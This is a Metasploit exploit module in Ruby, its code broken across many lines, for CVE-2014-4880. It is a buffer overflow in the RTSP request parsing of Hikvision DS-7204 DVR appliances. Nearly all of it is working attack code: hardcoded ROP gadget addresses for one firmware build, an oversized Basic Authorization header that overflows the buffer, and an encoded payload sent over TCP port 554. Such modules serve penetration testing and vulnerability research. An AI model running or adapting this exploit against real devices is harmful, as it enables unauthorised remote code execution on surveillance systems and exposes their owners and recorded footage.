##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
class
Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Exploit::Remote::Tcp
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'Hikvision DVR RTSP Request Remote Code Execution'
,
'Description'
=> %q{
This
module
exploits a buffer overflow
in
the
RTSP
request parsing
code of Hikvision
DVR
appliances. The Hikvision
DVR
devices record
video feeds of surveillance cameras
and
offer remote administration
and
playback of recorded footage.
The vulnerability is present
in
several models / firmware versions
but due to the available test device this
module
only supports
the
DS
-
7204
model.
},
'Author'
=>
[
'Mark Schloesser <mark_schloesser[at]rapid7.com>'
,
# @repmovsb, vulnerability analysis & exploit dev
],
'License'
=>
MSF_LICENSE
,
'References'
=>
[
[
'CVE'
,
'2014-4880'
],
],
'Platform'
=>
'linux'
,
'Arch'
=>
ARCH_ARMLE
,
'Privileged'
=>
true
,
'Targets'
=>
[
#
# ROP targets are difficult to represent in the hash, use callbacks instead
#
[
"DS-7204 Firmware V2.2.10 build 131009"
, {
# The callback handles all target-specific settings
:callback
=>
:target_ds7204_1
,
'g_adjustesp'
=> 0x002c828c,
# ADD SP, SP, #0x350
# LDMFD SP!, {R4-R6,PC}
'g_r3fromsp'
=> 0x00446f80,
# ADD R3, SP, #0x60+var_58
# BLX R6
'g_blxr3_pop'
=> 0x00456360,
# BLX R3
# LDMFD SP!, {R1-R7,PC}
'g_popr3'
=> 0x0000fe98,
# LDMFD SP!, {R3,PC}
} ],
[
"Debug Target"
, {
# The callback handles all target-specific settings
:callback
=>
:target_debug
} ]
],
'DefaultTarget'
=>
0
,
'DisclosureDate'
=>
'Nov 19 2014'
))
register_options(
[
Opt::
RPORT
(
554
)
],
self
.
class
)
end
def
exploit
unless
self
.respond_to?(target[
:callback
])
fail_with(Failure::NoTarget,
"Invalid target specified: no callback function defined"
)
end
device_rop =
self
.send(target[
:callback
])
request =
"PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
request <<
"CSeq: 7\r\n"
request <<
"Authorization: Basic "
request << rand_text_alpha(0x280 +
34
)
request << [target[
"g_adjustesp"
]].pack(
"V"
)[
0
..
2
]
request <<
"\r\n\r\n"
request << rand_text_alpha(
19
)
# now append the ropchain
request << device_rop
request << rand_text_alpha(
8
)
request << payload.encoded
connect
sock.put(request)
disconnect
end
# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
def
target_ds7204_1
# Create a fixed-size buffer for the rop chain
ropbuf = rand_text_alpha(
24
)
# CHAIN = [
# 0, #R4 pop adjustsp
# 0, #R5 pop adjustsp
# GADGET_BLXR3_POP, #R6 pop adjustsp
# GADGET_POPR3,
# 0, #R3 pop
# GADGET_R3FROMSP,
# ]
ropbuf[
8
,
4
] = [target[
"g_blxr3_pop"
]].pack(
"V"
)
ropbuf[
12
,
4
] = [target[
"g_popr3"
]].pack(
"V"
)
ropbuf[
20
,
4
] = [target[
"g_r3fromsp"
]].pack(
"V"
)
return
ropbuf
end
# Generate a buffer that provides a starting point for exploit development
def
target_debug
Rex::Text.pattern_create(
2000
)
end
def
rhost
datastore[
'RHOST'
]
end
def
rport
datastore[
'RPORT'
]
end
end